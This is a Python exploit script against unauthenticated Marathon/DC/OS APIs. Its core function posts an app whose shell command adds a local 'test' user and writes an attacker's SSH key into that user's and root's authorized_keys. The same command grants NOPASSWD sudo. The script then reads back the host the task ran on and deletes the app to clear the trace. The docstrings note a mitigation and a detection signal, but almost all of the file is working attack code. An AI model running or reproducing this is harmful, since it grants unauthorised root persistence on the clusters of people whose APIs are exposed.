import sys
import requests
import time
import json
import queue
import configparser
config = configparser.ConfigParser()
# conf.ini is resolved against the current working directory; ConfigParser.read()
# silently ignores a missing file, so a missing config surfaces as a
# NoSectionError from config.get() below rather than a file error.
config.read('conf.ini')
# Public SSH key that postExploit() writes into authorized_keys on the target
# node; it is inserted into the Marathon app command verbatim (not escaped).
ssh_pub = config.get('exploit', 'ssh_pub')
# Hand-off channel between postExploit() (puts the created app id) and
# exploit() (gets it back to delete the app).
q = queue.Queue()
'''
Execute a process in Marathon that creates a user on the node
'''
def postExploit(url: str) -> str | None:
    """Create a Marathon app on *url* whose command adds a local user with SSH and sudo access.

    The app definition is POSTed, without any authentication, to
    ``/service/marathon/v2/apps``. A 201 means Marathon accepted it; the app is
    then read back to learn which agent node ran the task. An unauthenticated,
    network-reachable Marathon API is therefore equivalent to root on its agents:
    the mitigation is to require authentication on the Marathon/DC-OS endpoint and
    keep it off untrusted networks, and app creations whose ``cmd`` touches
    ``authorized_keys`` or ``/etc/sudoers`` are a reliable detection signal.

    Args:
        url: Base URL of the DC/OS master (scheme and host, no trailing slash).

    Returns:
        The ``host`` of the first task of the created app; ``None`` when the app
        was created but could not be read back, or on a connection/timeout error.
        On any non-201 response the whole process exits with status 1.

    Side effects:
        On a 201 response the generated app id is pushed onto the module-level
        queue ``q`` so that exploit()/delExploit() can remove the app later.
    """
    urlexploit = url + "/service/marathon/v2/apps"
    # App id is unique per second; it doubles as the key for the later read-back
    # and deletion. Shadows the builtin id().
    id = "test" + str(int(time.time()))
    # Escaped quotes so the sudoers line survives both JSON decoding and the shell.
    sudoers = '\\"test ALL=(ALL) NOPASSWD:ALL\\"'
    # Raw JSON built by string concatenation; ssh_pub is inserted verbatim, so a
    # key containing a double quote would produce an invalid document.
    data = '{"cmd":"/usr/sbin/useradd test && mkdir -p /home/test/.ssh && echo -n ' + ssh_pub + ' > /home/test/.ssh/authorized_keys && echo -n ' + ssh_pub + ' >> /root/.ssh/authorized_keys && echo ' + sudoers + ' >> /etc/sudoers && sleep 1000","cpus":1,"mem":128,"disk":0,"instances":1,"id":"' + id + '"}'
    host = None
    try:
        print("Trying to inject exploit in URL {}".format(urlexploit))
        # verify=False disables TLS certificate validation for this request.
        req = requests.post(urlexploit, timeout=10, data=data, verify=False)
        if req.status_code == 201:
            print("Successful exploitation in URL {}\nCreated app with id {}".format(url, id))
            urlget = urlexploit + "/" + id
            # Give Marathon time to schedule the task before reading it back.
            time.sleep(10)
            req2 = requests.get(urlget, timeout=5, verify=False)
            if req2.status_code == 200:
                reqjq = json.loads(req2.text)
                # IndexError if 'tasks' is still empty at this point.
                host = reqjq['app']['tasks'][0]['host']
            # The id is queued whenever the app was created, even if the
            # read-back above did not return 200.
            q.put(id)
        else:
            print("\nError! Cannot inject exploit in URL {} due to HTTP error {}".format(url, req.status_code))
            # SystemExit is not in the except tuple below, so this terminates.
            sys.exit(1)
        return host
    except (requests.ConnectTimeout, requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout) as e:
        # Falls through and returns None implicitly.
        print("\nError! Cannot inject exploit in URL {} due to:\n{}".format(url, e))
'''
Delete the process that was created in Marathon
'''
def delExploit(url: str, id: str) -> None:
    """Delete the Marathon app *id* that postExploit() created on *url*.

    Sends an unauthenticated DELETE (TLS verification disabled) to
    ``/service/marathon/v2/apps/<id>``. A 200 is reported as success; any other
    status code is not reported at all.

    Args:
        url: Base URL of the DC/OS master, as passed to postExploit().
        id: Marathon app id handed over through the queue ``q``.

    Note: the error message in the except branch reuses the "inject" wording
    from postExploit() although this function only deletes.
    """
    urldel = url + "/service/marathon/v2/apps" + "/" + id
    try:
        print("Trying to delete service with ID {}".format(id))
        req = requests.delete(urldel, timeout=10, verify=False)
        if req.status_code == 200:
            print("Successful deletion in URL {}\nDeleted service with id {}".format(url, id))
    except (requests.ConnectTimeout, requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout) as e:
        print("\nError! Cannot inject exploit in URL {} due to:\n{}".format(url, e))
def exploit(url: str) -> str | None:
    """Run the create / wait / delete cycle against *url* and return the task host.

    Calls postExploit(), waits 5 seconds, then takes the app id from the
    module-level queue ``q`` and hands it to delExploit(). Because the id travels
    through ``q`` rather than a return value, an empty queue (postExploit() did
    not get a 201, or another caller consumed the id) is treated as fatal.

    Args:
        url: Base URL of the DC/OS master.

    Returns:
        Whatever postExploit() returned: the task host, or ``None``.

    Exits:
        With status 1 when no app id is available in ``q``.
    """
    host = postExploit(url)
    print("Sleeping 5 seconds while job is being done...")
    time.sleep(5)
    # Debug output: number of app ids waiting in the queue.
    print(q.qsize())
    if q.qsize() > 0:
        id = q.get()  # shadows the builtin id()
    else:
        print("Error! Cannot delete app. Exiting...")
        sys.exit(1)
    delExploit(url, id)
    return host